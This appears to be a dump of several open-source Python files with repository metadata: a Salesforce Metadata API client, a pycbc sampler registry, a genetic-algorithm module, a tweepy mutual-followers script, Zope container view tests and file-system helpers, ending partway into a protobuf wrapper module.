repo_name (string, 5-92 chars) | path (string, 4-232 chars) | copies (19 classes) | size (string, 4-7 chars) | content (string, 721-1.04M chars) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---|
rbauction/sfdclib | sfdclib/metadata.py | 1 | 10823 | """ Class to work with Salesforce Metadata API """
from base64 import b64encode, b64decode
from xml.etree import ElementTree as ET
import sfdclib.messages as msg
class SfdcMetadataApi:
""" Class to work with Salesforce Metadata API """
_METADATA_API_BASE_URI = "/services/Soap/m/{version}"
_XML_NAMESPACES = {
'soapenv': 'http://schemas.xmlsoap.org/soap/envelope/',
'mt': 'http://soap.sforce.com/2006/04/metadata'
}
def __init__(self, session):
if not session.is_connected():
raise Exception("Session must be connected prior to instantiating this class")
self._session = session
self._deploy_zip = None
def _get_api_url(self):
return "%s%s" % (
self._session.get_server_url(),
self._METADATA_API_BASE_URI.format(**{'version': self._session.get_api_version()}))
def deploy(self, zipfile, options):
""" Kicks off async deployment, returns deployment id """
check_only = ""
if 'checkonly' in options:
check_only = "<met:checkOnly>%s</met:checkOnly>" % options['checkonly']
test_level = ""
if 'testlevel' in options:
test_level = "<met:testLevel>%s</met:testLevel>" % options['testlevel']
tests_tag = ""
if 'tests' in options:
for test in options['tests']:
tests_tag += "<met:runTests>%s</met:runTests>\n" % test
attributes = {
'client': 'Metahelper',
'checkOnly': check_only,
'sessionId': self._session.get_session_id(),
'ZipFile': self._read_deploy_zip(zipfile),
'testLevel': test_level,
'tests': tests_tag
}
request = msg.DEPLOY_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'deploy'}
res = self._session.post(self._get_api_url(), headers=headers, data=request)
if res.status_code != 200:
raise Exception(
"Request failed with %d code and error [%s]" %
(res.status_code, res.text))
async_process_id = ET.fromstring(res.text).find(
'soapenv:Body/mt:deployResponse/mt:result/mt:id',
self._XML_NAMESPACES).text
state = ET.fromstring(res.text).find(
'soapenv:Body/mt:deployResponse/mt:result/mt:state',
self._XML_NAMESPACES).text
return async_process_id, state
@staticmethod
def _read_deploy_zip(zipfile):
if hasattr(zipfile, 'read'):
file = zipfile
file.seek(0)
should_close = False
else:
file = open(zipfile, 'rb')
should_close = True
raw = file.read()
if should_close:
file.close()
return b64encode(raw).decode("utf-8")
def _retrieve_deploy_result(self, async_process_id):
""" Retrieves status for specified deployment id """
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'asyncProcessId': async_process_id,
'includeDetails': 'true'
}
mt_request = msg.CHECK_DEPLOY_STATUS_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkDeployStatus'}
res = self._session.post(self._get_api_url(), headers=headers, data=mt_request)
root = ET.fromstring(res.text)
result = root.find(
'soapenv:Body/mt:checkDeployStatusResponse/mt:result',
self._XML_NAMESPACES)
if result is None:
raise Exception("Result node could not be found: %s" % res.text)
return result
def check_deploy_status(self, async_process_id):
""" Checks whether deployment succeeded """
result = self._retrieve_deploy_result(async_process_id)
state = result.find('mt:status', self._XML_NAMESPACES).text
state_detail = result.find('mt:stateDetail', self._XML_NAMESPACES)
if state_detail is not None:
state_detail = state_detail.text
unit_test_errors = []
deployment_errors = []
if state == 'Failed':
# Deployment failures
failures = result.findall('mt:details/mt:componentFailures', self._XML_NAMESPACES)
for failure in failures:
deployment_errors.append({
'type': failure.find('mt:componentType', self._XML_NAMESPACES).text,
'file': failure.find('mt:fileName', self._XML_NAMESPACES).text,
'status': failure.find('mt:problemType', self._XML_NAMESPACES).text,
'message': failure.find('mt:problem', self._XML_NAMESPACES).text
})
# Unit test failures
failures = result.findall(
'mt:details/mt:runTestResult/mt:failures',
self._XML_NAMESPACES)
for failure in failures:
unit_test_errors.append({
'class': failure.find('mt:name', self._XML_NAMESPACES).text,
'method': failure.find('mt:methodName', self._XML_NAMESPACES).text,
'message': failure.find('mt:message', self._XML_NAMESPACES).text,
'stack_trace': failure.find('mt:stackTrace', self._XML_NAMESPACES).text
})
deployment_detail = {
'total_count': result.find('mt:numberComponentsTotal', self._XML_NAMESPACES).text,
'failed_count': result.find('mt:numberComponentErrors', self._XML_NAMESPACES).text,
'deployed_count': result.find('mt:numberComponentsDeployed', self._XML_NAMESPACES).text,
'errors': deployment_errors
}
unit_test_detail = {
'total_count': result.find('mt:numberTestsTotal', self._XML_NAMESPACES).text,
'failed_count': result.find('mt:numberTestErrors', self._XML_NAMESPACES).text,
'completed_count': result.find('mt:numberTestsCompleted', self._XML_NAMESPACES).text,
'errors': unit_test_errors
}
return state, state_detail, deployment_detail, unit_test_detail
def download_unit_test_logs(self, async_process_id):
""" Downloads Apex logs for unit tests executed during specified deployment """
# NOTE: actual log retrieval is not implemented here; this only dumps the
# raw checkDeployStatus result XML for inspection.
result = self._retrieve_deploy_result(async_process_id)
print("Results: %s" % ET.tostring(result, encoding="us-ascii", method="xml"))
def retrieve(self, options):
""" Submits retrieve request """
# Compose unpackaged XML
unpackaged = ''
for metadata_type in options['unpackaged']:
members = options['unpackaged'][metadata_type]
unpackaged += '<types>'
for member in members:
unpackaged += '<members>{0}</members>'.format(member)
unpackaged += '<name>{0}</name></types>'.format(metadata_type)
# Compose retrieve request XML
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'apiVersion': self._session.get_api_version(),
'singlePackage': options['single_package'],
'unpackaged': unpackaged
}
request = msg.RETRIEVE_MSG.format(**attributes)
# Submit request
headers = {'Content-type': 'text/xml', 'SOAPAction': 'retrieve'}
res = self._session.post(self._get_api_url(), headers=headers, data=request)
if res.status_code != 200:
raise Exception(
"Request failed with %d code and error [%s]" %
(res.status_code, res.text))
# Parse results to get async Id and status
async_process_id = ET.fromstring(res.text).find(
'soapenv:Body/mt:retrieveResponse/mt:result/mt:id',
self._XML_NAMESPACES).text
state = ET.fromstring(res.text).find(
'soapenv:Body/mt:retrieveResponse/mt:result/mt:state',
self._XML_NAMESPACES).text
return async_process_id, state
def _retrieve_retrieve_result(self, async_process_id, include_zip):
""" Retrieves status for specified retrieval id """
attributes = {
'client': 'Metahelper',
'sessionId': self._session.get_session_id(),
'asyncProcessId': async_process_id,
'includeZip': include_zip
}
mt_request = msg.CHECK_RETRIEVE_STATUS_MSG.format(**attributes)
headers = {'Content-type': 'text/xml', 'SOAPAction': 'checkRetrieveStatus'}
res = self._session.post(self._get_api_url(), headers=headers, data=mt_request)
root = ET.fromstring(res.text)
result = root.find(
'soapenv:Body/mt:checkRetrieveStatusResponse/mt:result',
self._XML_NAMESPACES)
if result is None:
raise Exception("Result node could not be found: %s" % res.text)
return result
def retrieve_zip(self, async_process_id):
""" Retrieves ZIP file """
result = self._retrieve_retrieve_result(async_process_id, 'true')
state = result.find('mt:status', self._XML_NAMESPACES).text
error_message = result.find('mt:errorMessage', self._XML_NAMESPACES)
if error_message is not None:
error_message = error_message.text
# Check if there are any messages
messages = []
message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES)
for message in message_list:
messages.append({
'file': message.find('mt:fileName', self._XML_NAMESPACES).text,
'message': message.find('mt:problem', self._XML_NAMESPACES).text
})
# Retrieve base64 encoded ZIP file
zipfile_base64 = result.find('mt:zipFile', self._XML_NAMESPACES).text
zipfile = b64decode(zipfile_base64)
return state, error_message, messages, zipfile
def check_retrieve_status(self, async_process_id):
""" Checks whether retrieval succeeded """
result = self._retrieve_retrieve_result(async_process_id, 'false')
state = result.find('mt:status', self._XML_NAMESPACES).text
error_message = result.find('mt:errorMessage', self._XML_NAMESPACES)
if error_message is not None:
error_message = error_message.text
# Check if there are any messages
messages = []
message_list = result.findall('mt:details/mt:messages', self._XML_NAMESPACES)
for message in message_list:
messages.append({
'file': message.find('mt:fileName', self._XML_NAMESPACES).text,
'message': message.find('mt:problem', self._XML_NAMESPACES).text
})
return state, error_message, messages
| mit | -2,345,350,160,945,566,700 | 42.119522 | 100 | 0.588931 | false |
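A hedged usage sketch for the `SfdcMetadataApi` class above. The `SfdcSession` import and its constructor keywords are assumptions about the surrounding sfdclib package, and the credentials and ZIP path are invented:

```python
import time
from sfdclib import SfdcSession, SfdcMetadataApi  # exports assumed

# Hypothetical credentials; SfdcSession's signature is an assumption.
session = SfdcSession(username='demo@example.com', password='secret',
                      token='api-token', is_sandbox=True)
session.login()

api = SfdcMetadataApi(session)
# Validation-only deployment of a hypothetical package.zip.
deploy_id, state = api.deploy('package.zip', {'checkonly': 'true'})

# Poll the asynchronous job until Salesforce reports a terminal state.
while state in ('Queued', 'Pending', 'InProgress'):
    time.sleep(5)
    state, detail, deploy_detail, test_detail = \
        api.check_deploy_status(deploy_id)

print(state, deploy_detail['failed_count'])
```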
bema-ligo/pycbc | pycbc/inference/sampler.py | 1 | 1386 | # Copyright (C) 2016 Christopher M. Biwer
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# =============================================================================
#
# Preamble
#
# =============================================================================
#
"""
This modules provides a list of implemented samplers for parameter estimation.
"""
import numpy
from pycbc.inference.sampler_kombine import KombineSampler
from pycbc.inference.sampler_emcee import EmceeEnsembleSampler, EmceePTSampler
# list of available samplers
samplers = {
KombineSampler.name : KombineSampler,
EmceeEnsembleSampler.name : EmceeEnsembleSampler,
EmceePTSampler.name : EmceePTSampler,
}
| gpl-3.0 | 3,212,687,464,336,453,600 | 36.459459 | 79 | 0.664502 | false |
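The `samplers` dict above is a plain name-to-class registry keyed on each sampler class's `name` attribute. A hedged sketch of resolving a sampler from a configuration string; the instantiation line is commented out because the constructors' signatures are not shown in this file:

```python
from pycbc.inference.sampler import samplers

name = "kombine"  # e.g. read from a configuration file
try:
    sampler_class = samplers[name]
except KeyError:
    raise ValueError("unknown sampler %r; choose from: %s"
                     % (name, ", ".join(sorted(samplers))))

# Constructor arguments are sampler-specific and not defined here:
# sampler = sampler_class(likelihood_evaluator, nwalkers=64)
```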
handcraftsman/GeneticAlgorithmsWithPython | es/ch03/genetic.py | 1 | 3034 | # File: genetic.py
# From chapter 3 of _Algoritmos Genéticos con Python_ (Genetic Algorithms with Python)
#
# Author: Clinton Sheppard <[email protected]>
# Copyright (c) 2017 Clinton Sheppard
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import random
import statistics
import sys
import time
def _generar_padre(longitud, geneSet, obtener_aptitud):
genes = []
while len(genes) < longitud:
tamañoMuestral = min(longitud - len(genes), len(geneSet))
genes.extend(random.sample(geneSet, tamañoMuestral))
aptitud = obtener_aptitud(genes)
return Cromosoma(genes, aptitud)
def _mutar(padre, geneSet, obtener_aptitud):
genesDelNiño = padre.Genes[:]
índice = random.randrange(0, len(padre.Genes))
nuevoGen, alterno = random.sample(geneSet, 2)
genesDelNiño[índice] = alterno if nuevoGen == genesDelNiño[
índice] else nuevoGen
aptitud = obtener_aptitud(genesDelNiño)
return Cromosoma(genesDelNiño, aptitud)
def obtener_mejor(obtener_aptitud, longitudObjetivo, aptitudÓptima, geneSet,
mostrar):
random.seed()
def fnMutar(padre):
return _mutar(padre, geneSet, obtener_aptitud)
def fnGenerarPadre():
return _generar_padre(longitudObjetivo, geneSet, obtener_aptitud)
for mejora in _obtener_mejoras(fnMutar, fnGenerarPadre):
mostrar(mejora)
if not aptitudÓptima > mejora.Aptitud:
return mejora
def _obtener_mejoras(nuevo_niño, generar_padre):
mejorPadre = generar_padre()
yield mejorPadre
while True:
niño = nuevo_niño(mejorPadre)
if mejorPadre.Aptitud > niño.Aptitud:
continue
if not niño.Aptitud > mejorPadre.Aptitud:
mejorPadre = niño
continue
yield niño
mejorPadre = niño
class Cromosoma:
def __init__(self, genes, aptitud):
self.Genes = genes
self.Aptitud = aptitud
class Comparar:
@staticmethod
def ejecutar(función):
cronometrajes = []
stdout = sys.stdout
for i in range(100):
sys.stdout = None
horaInicio = time.time()
función()
segundos = time.time() - horaInicio
sys.stdout = stdout
cronometrajes.append(segundos)
promedio = statistics.mean(cronometrajes)
if i < 10 or i % 10 == 9:
print("{} {:3.2f} {:3.2f}".format(
1 + i, promedio,
statistics.stdev(cronometrajes, promedio) if i > 1 else 0))
| apache-2.0 | 243,886,378,590,808,930 | 30.684211 | 79 | 0.652492 | false |
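A hedged driver for the `genetic` module above, using a toy "match the target string" fitness; the target, gene set, and display callback are invented for illustration and are not the book's own chapter exercise:

```python
import datetime
import genetic  # the module listed above

objetivo = list("Hola Mundo")
geneSet = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def obtener_aptitud(genes):
    # Fitness = number of positions matching the hidden target.
    return sum(1 for esperado, real in zip(objetivo, genes)
               if esperado == real)

horaInicio = datetime.datetime.now()

def mostrar(candidato):
    print("{}\t{}\t{}".format("".join(candidato.Genes), candidato.Aptitud,
                              datetime.datetime.now() - horaInicio))

# The optimal fitness equals the target length, so the search stops on
# an exact match.
mejor = genetic.obtener_mejor(obtener_aptitud, len(objetivo),
                              len(objetivo), geneSet, mostrar)
```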
basilhskk/ergasies | ergasia8.py | 1 | 1425 | #imports
import tweepy
from tweepy import OAuthHandler
#keys
ckey='...'
csecret='...'
atoken='...'
asecret='...'
# Error handling; Twitter only returns follower IDs 5,000 at a time, so Cursor paging plus wait_on_rate_limit is used.
try:
auth = OAuthHandler(ckey, csecret)
auth.set_access_token(atoken, asecret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True, compression=True)
# Look up both users' IDs.
user1=raw_input("Give the first name: ")
user2=raw_input("Give me second name: ")
user=api.get_user(user1)
userid1=user.id
user=api.get_user(user2)
userid2=user.id
#collecting user1 followers.
fuser1 = tweepy.Cursor(api.followers_ids, id = userid1)
ids1=[]
for page in fuser1.pages():
ids1.extend(page)
#collecting user2 followers.
ids2=[]
fuser2 = tweepy.Cursor(api.followers_ids, id = userid2)
for page in fuser2.pages():
ids2.extend(page)
except BaseException, e:
print "Error",str(e)
#finding the mutual followers.
mids=[]
for i in range(0,len(ids1)):
if ids1[i] in ids2:
u= api.get_user(ids1[i])
mids.append(u.screen_name)
#printing final results.
if len(mids)==0:
print user1,"and",user2,"have no mutual followers."
elif len(mids)==1:
print "The mutual followers of",user1,"and",user2,"is:" ,[item.encode('utf-8') for item in mids]
else:
print "The mutual followers of",user1,"and",user2,"are:" ,[item.encode('utf-8') for item in mids]
| gpl-3.0 | -8,160,394,223,410,080,000 | 29.978261 | 101 | 0.669474 | false |
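The membership loop above is quadratic and issues one `get_user` call per mutual follower. A hedged alternative using a set intersection plus tweepy's batch `lookup_users` call (its availability and 100-ID-per-request limit are assumptions about this tweepy version):

```python
# Linear-time intersection of the two follower lists.
mutual = sorted(set(ids1) & set(ids2))

# Resolve screen names in batches of up to 100 IDs per request.
mids = []
for i in range(0, len(mutual), 100):
    batch = mutual[i:i + 100]
    mids.extend(u.screen_name for u in api.lookup_users(user_ids=batch))
```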
Donkyhotay/MoonPy | zope/app/container/browser/ftests/test_contents.py | 1 | 14353 | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Functional tests for the Container's 'Contents' view
$Id: test_contents.py 67630 2006-04-27 00:54:03Z jim $
"""
import unittest
from persistent import Persistent
import transaction
from zope import copypastemove
from zope.interface import implements, Interface
from zope.annotation.interfaces import IAttributeAnnotatable
from zope.dublincore.interfaces import IZopeDublinCore
from zope.app.container.interfaces import IReadContainer, IContained
from zope.app.testing import ztapi
from zope.app.testing.functional import BrowserTestCase
from zope.app.testing.functional import FunctionalDocFileSuite
class IImmovable(Interface):
"""Marker interface for immovable objects."""
class IUncopyable(Interface):
"""Marker interface for uncopyable objects."""
class File(Persistent):
implements(IAttributeAnnotatable)
class ImmovableFile(File):
implements(IImmovable)
class UncopyableFile(File):
implements(IUncopyable)
class ObjectNonCopier(copypastemove.ObjectCopier):
def copyable(self):
return False
class ObjectNonMover(copypastemove.ObjectMover):
def moveable(self):
return False
class ReadOnlyContainer(Persistent):
implements(IReadContainer, IContained)
__parent__ = __name__ = None
def __init__(self): self.data = {}
def keys(self): return self.data.keys()
def __getitem__(self, key): return self.data[key]
def get(self, key, default=None): return self.data.get(key, default)
def __iter__(self): return iter(self.data)
def values(self): return self.data.values()
def __len__(self): return len(self.data)
def items(self): return self.data.items()
def __contains__(self, key): return key in self.data
def has_key(self, key): return self.data.has_key(key)
class Test(BrowserTestCase):
def test_inplace_add(self):
root = self.getRootFolder()
self.assert_('foo' not in root)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.File'})
body = ' '.join(response.getBody().split())
self.assert_(body.find('type="hidden" name="type_name"') >= 0)
self.assert_(body.find('input name="new_value"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'type_name': u'zope.app.content.File',
'new_value': 'foo'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' in root)
def test_inplace_rename_multiple(self):
root = self.getRootFolder()
root['foo'] = File()
self.assert_('foo' in root)
transaction.commit()
# Check that we don't change mode if there are no items selected
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'container_rename_button': u''})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') < 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
< 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
>= 0)
self.assert_(body.find('div class="page_error"')
>= 0)
# Check normal multiple select
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'container_rename_button': u'',
'ids': ['foo']})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo'],
'new_value': ['bar']})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' not in root)
self.assert_('bar' in root)
def test_inplace_rename_single(self):
root = self.getRootFolder()
root['foo'] = File()
self.assert_('foo' in root)
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo']})
body = ' '.join(response.getBody().split())
self.assert_(body.find('input name="new_value:list"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'rename_ids': ['foo'],
'new_value': ['bar']})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' not in root)
self.assert_('bar' in root)
def test_inplace_change_title(self):
root = self.getRootFolder()
root['foo'] = File()
transaction.commit()
self.assert_('foo' in root)
dc = IZopeDublinCore(root['foo'])
self.assert_(dc.title == '')
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'retitle_id': u'foo'})
body = ' '.join(response.getBody().split())
self.assert_(body.find('type="hidden" name="retitle_id"') >= 0)
self.assert_(body.find('input name="new_value"') >= 0)
self.assert_(body.find('type="submit" name="container_cancel_button"')
>= 0)
self.assert_(body.find('type="submit" name="container_rename_button"')
< 0)
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'retitle_id': u'foo',
'new_value': u'test title'})
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
root._p_jar.sync()
self.assert_('foo' in root)
dc = IZopeDublinCore(root['foo'])
self.assert_(dc.title == 'test title')
def test_pasteable_for_deleted_clipboard_item(self):
"""Tests Paste button visibility when copied item is deleted."""
root = self.getRootFolder()
root['foo'] = File() # item to be copied/deleted
root['bar'] = File() # ensures that there's always an item in
# the collection view
transaction.commit()
# confirm foo in contents, Copy button visible, Paste not visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<a href="foo/@@SelectedManagementView.html">foo</a>') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_copy_button"') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
# copy foo - confirm Paste visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'ids' : ('foo',),
'container_copy_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# delete foo -> nothing valid to paste -> Paste should not be visible
del root['foo']
transaction.commit()
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
def test_paste_for_deleted_clipboard_item(self):
"""Tests paste operation when one of two copied items is deleted."""
root = self.getRootFolder()
root['foo'] = File()
root['bar'] = File()
transaction.commit()
# confirm foo/bar in contents, Copy button visible, Paste not visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<a href="foo/@@SelectedManagementView.html">foo</a>') != -1)
self.assert_(response.getBody().find(
'<a href="bar/@@SelectedManagementView.html">bar</a>') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_copy_button"') != -1)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') == -1)
# copy foo and bar - confirm Paste visible
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'ids' : ('foo', 'bar'),
'container_copy_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# delete only foo -> bar still available -> Paste should be visible
del root['foo']
transaction.commit()
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
self.assert_(response.getBody().find(
'<input type="submit" name="container_paste_button"') != -1)
# paste clipboard contents - only bar should be copied
response = self.publish('/@@contents.html', basic='mgr:mgrpw', form={
'container_paste_button' : '' })
self.assertEqual(response.getStatus(), 302)
self.assertEqual(response.getHeader('Location'),
'http://localhost/@@contents.html')
response = self.publish('/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
root._p_jar.sync()
self.assertEqual(tuple(root.keys()), ('bar', 'bar-2'))
def test_readonly_display(self):
root = self.getRootFolder()
root['foo'] = ReadOnlyContainer()
transaction.commit()
response = self.publish('/foo/@@contents.html', basic='mgr:mgrpw')
self.assertEqual(response.getStatus(), 200)
def test_uncopyable_object(self):
ztapi.provideAdapter(IUncopyable,
copypastemove.interfaces.IObjectCopier,
ObjectNonCopier)
root = self.getRootFolder()
root['uncopyable'] = UncopyableFile()
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'ids': [u'uncopyable'],
'container_copy_button': u'Copy'})
self.assertEqual(response.getStatus(), 200)
body = response.getBody()
self.assert_("cannot be copied" in body)
def test_unmoveable_object(self):
ztapi.provideAdapter(IImmovable,
copypastemove.interfaces.IObjectMover,
ObjectNonMover)
root = self.getRootFolder()
root['immovable'] = ImmovableFile()
transaction.commit()
response = self.publish('/@@contents.html',
basic='mgr:mgrpw',
form={'ids': [u'immovable'],
'container_cut_button': u'Cut'})
self.assertEqual(response.getStatus(), 200)
body = response.getBody()
self.assert_("cannot be moved" in body)
def test_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(FunctionalDocFileSuite("index.txt"))
return suite
if __name__=='__main__':
unittest.main(defaultTest='test_suite')
| gpl-3.0 | -3,529,249,201,198,915,000 | 40.363112 | 78 | 0.561416 | false |
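The tests above lean on one Zope idiom worth isolating: behaviour is switched by registering a different adapter for a marker interface (`IImmovable`, `IUncopyable`) rather than by subclass checks. A minimal self-contained sketch of the marker-interface half of that idiom; the names below are invented:

```python
from zope.interface import Interface, implements

class IFrozen(Interface):
    """Hypothetical marker: instances must not be modified."""

class Document(object):
    pass

class FrozenDocument(Document):
    implements(IFrozen)

def can_modify(obj):
    # Behaviour keys off the marker, not the concrete class, just as
    # ObjectNonCopier/ObjectNonMover are keyed to the markers above.
    return not IFrozen.providedBy(obj)

assert can_modify(Document())
assert not can_modify(FrozenDocument())
```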
jimzhan/pyx | rex/core/fs.py | 1 | 4479 | # -*- coding: utf-8 -*-
"""
Functions that interact with local file system.
"""
from __future__ import with_statement
import os
import shutil
import logging
import itertools
from rex.core import regex
logger = logging.getLogger(__name__)
#==========================================================================================
# General/Common Properties
#==========================================================================================
sysroot = os.path.abspath('/')
userdir = os.path.expanduser('~')
def realpath(path):
"""
Create the real absolute path for the given path.
Add supports for userdir & / supports.
Args:
* path: pathname to use for realpath.
Returns:
Platform independent real absolute path.
"""
if path == '~':
return userdir
if path == '/':
return sysroot
if path.startswith('/'):
return os.path.abspath(path)
if path.startswith('~/'):
return os.path.expanduser(path)
if path.startswith('./'):
return os.path.abspath(os.path.join(os.path.curdir, path[2:]))
return os.path.abspath(path)
def find(pattern, path=os.path.curdir, recursive=False):
"""
Find absolute file/folder paths with the given ``re`` pattern.
Args:
* pattern: search pattern, support both string (exact match) and `re` pattern.
* path: root path to start searching, default is current working directory.
* recursive: whether to recursively find the matched items from `path`, False by default
Returns:
Generator of the matched items of Files/Folders.
"""
root = realpath(path)
Finder = lambda item: regex.is_regex(pattern) \
and pattern.match(item) or (pattern == item)
if recursive:
for base, dirs, files in os.walk(root, topdown=True):
for segment in itertools.chain(filter(Finder, files), filter(Finder, dirs)):
yield FS(os.path.join(base, segment))
else:
for segment in filter(Finder, os.listdir(root)):
yield FS(os.path.join(root, segment))
class FS(object):
"""
Generic file system object.
Attributes:
* path: absolute path of the file system object.
"""
def __init__(self, path, *args, **kwargs):
self.path = realpath(path)
def __unicode__(self):
return self.path
def __repr__(self):
return self.path
@property
def exists(self):
return os.path.exists(self.path)
@property
def name(self):
return os.path.basename(self.path)
def copy(self, dest):
"""
Copy item to the given `dest` path.
Args:
* dest: destination path to copy.
"""
if os.path.isfile(self.path):
shutil.copy2(self.path, dest)
else:
shutil.copytree(self.path, dest, symlinks=False, ignore=None)
def create(self):
"""
Create item under file system with its path.
NOTE: os.path.isfile() is False for a path that does not exist yet,
so this base implementation can only ever create folders; use the
File and Folder subclasses below for unambiguous behaviour.
"""
if os.path.isfile(self.path):
if not os.path.exists(self.path):
with open(self.path, 'w') as fileobj:
fileobj.write('')
else:
os.makedirs(self.path)
def delete(self):
"""
Delete the file/folder itself from file system.
"""
if os.path.isfile(self.path):
os.remove(self.path)
else:
shutil.rmtree(self.path)
def move(self, dest):
"""
Move item to the given `dest` path.
Args:
* dest: destination path to move.
"""
shutil.move(self.path, dest)
def flush(self):
"""
Commit the marked action, against `revert`.
"""
raise NotImplementedError
def revert(self):
"""
Revert the last action.
"""
raise NotImplementedError
class File(FS):
def create(self):
"""
Create the file (with empty content) if it does not already exist.
"""
if not os.path.exists(self.path):
with open(self.path, 'w') as fileobj:
fileobj.write('')
class Folder(FS):
def create(self):
"""
Recursively create the folder using its path.
"""
os.makedirs(self.path)
| apache-2.0 | -6,516,505,945,339,783,000 | 21.852041 | 96 | 0.546997 | false |
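A hedged usage sketch for the helpers above (note the fix making `find` yield `FS` wrappers in both branches); it assumes `rex.core.regex.is_regex` recognises compiled `re` patterns, and the paths are invented:

```python
import re
from rex.core import fs  # import path assumed from this repo's layout

# Recursively find every *.py file under ~/projects.
for item in fs.find(re.compile(r'.*\.py$'), path='~/projects',
                    recursive=True):
    print(item.path)

# Folder lifecycle through the FS wrappers.
demo = fs.Folder('~/tmp/demo')
if not demo.exists:
    demo.create()
demo.copy(fs.realpath('~/tmp/demo-copy'))  # copytree: dest must not exist
demo.delete()
```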
chengsoonong/acton | acton/proto/wrappers.py | 1 | 16442 | """Classes that wrap protobufs."""
import json
from typing import Union, List, Iterable
import acton.database
